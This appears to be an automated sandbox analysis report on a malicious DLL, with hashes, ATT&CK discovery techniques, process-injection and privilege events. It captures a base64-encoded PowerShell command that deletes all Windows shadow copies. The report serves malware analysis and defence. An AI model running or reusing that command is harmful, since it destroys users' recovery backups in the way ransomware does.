d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff

General

Target

d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll
Size

166KB
MD5

46a10b1e1fe68e124c86ee237751fd44
SHA1

78f29761f7f0f57a8f92e5f23d9e4d2d6465e848
SHA256

d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff
SHA512

c0fbd92fcb136fd5376efba041d4170eccd8bae219812ef00dfc7edfe26f06b651153bdfa2b01d648ebbbc6901c3205790c26a037f85625c0722173d843e633a

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	process
File opened (read-only)	\??\P:	rundll32.exe
File opened (read-only)	\??\U:	rundll32.exe
File opened (read-only)	\??\W:	rundll32.exe
File opened (read-only)	\??\Y:	rundll32.exe
File opened (read-only)	\??\B:	rundll32.exe
File opened (read-only)	\??\F:	rundll32.exe
File opened (read-only)	\??\L:	rundll32.exe
File opened (read-only)	\??\O:	rundll32.exe
File opened (read-only)	\??\A:	rundll32.exe
File opened (read-only)	\??\J:	rundll32.exe
File opened (read-only)	\??\M:	rundll32.exe
File opened (read-only)	\??\R:	rundll32.exe
File opened (read-only)	\??\T:	rundll32.exe
File opened (read-only)	\??\V:	rundll32.exe
File opened (read-only)	\??\X:	rundll32.exe
File opened (read-only)	\??\G:	rundll32.exe
File opened (read-only)	\??\I:	rundll32.exe
File opened (read-only)	\??\K:	rundll32.exe
File opened (read-only)	\??\Q:	rundll32.exe
File opened (read-only)	\??\S:	rundll32.exe
File opened (read-only)	\??\Z:	rundll32.exe
File opened (read-only)	\??\E:	rundll32.exe
File opened (read-only)	\??\H:	rundll32.exe
File opened (read-only)	\??\N:	rundll32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exepowershell.exe

pid process

948 rundll32.exe
1376 powershell.exe

pid	process
948	rundll32.exe
1376	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

rundll32.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	948	rundll32.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeBackupPrivilege	832	vssvc.exe
Token: SeRestorePrivilege	832	vssvc.exe
Token: SeAuditPrivilege	832	vssvc.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

rundll32.exerundll32.exe

description	pid	process	target process
PID 1612 wrote to memory of 948	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 948	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 948	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 948	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 948	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 948	1612	rundll32.exe	rundll32.exe
PID 1612 wrote to memory of 948	1612	rundll32.exe	rundll32.exe
PID 948 wrote to memory of 1376	948	rundll32.exe	powershell.exe
PID 948 wrote to memory of 1376	948	rundll32.exe	powershell.exe
PID 948 wrote to memory of 1376	948	rundll32.exe	powershell.exe
PID 948 wrote to memory of 1376	948	rundll32.exe	powershell.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d48edfe661d15d1146923844c2bc79f5992a2c38d4bb60c6d9f67094492194ff.dll,#1
2⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:788

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:832

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/948-55-0x0000000075F81000-0x0000000075F83000-memory.dmp

Filesize
8KB

Download
memory/1376-56-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp

Filesize
8KB

Download
memory/1376-57-0x000007FEF2D80000-0x000007FEF38DD000-memory.dmp

Filesize
11.4MB

Download
memory/1376-59-0x0000000002420000-0x0000000002422000-memory.dmp

Filesize
8KB

Download
memory/1376-61-0x0000000002424000-0x0000000002427000-memory.dmp

Filesize
12KB

Download
memory/1376-60-0x0000000002422000-0x0000000002424000-memory.dmp

Filesize
8KB

Download
memory/1376-58-0x000000001B830000-0x000000001BB2F000-memory.dmp

Filesize
3.0MB

Download
memory/1376-62-0x000000000242B000-0x000000000244A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads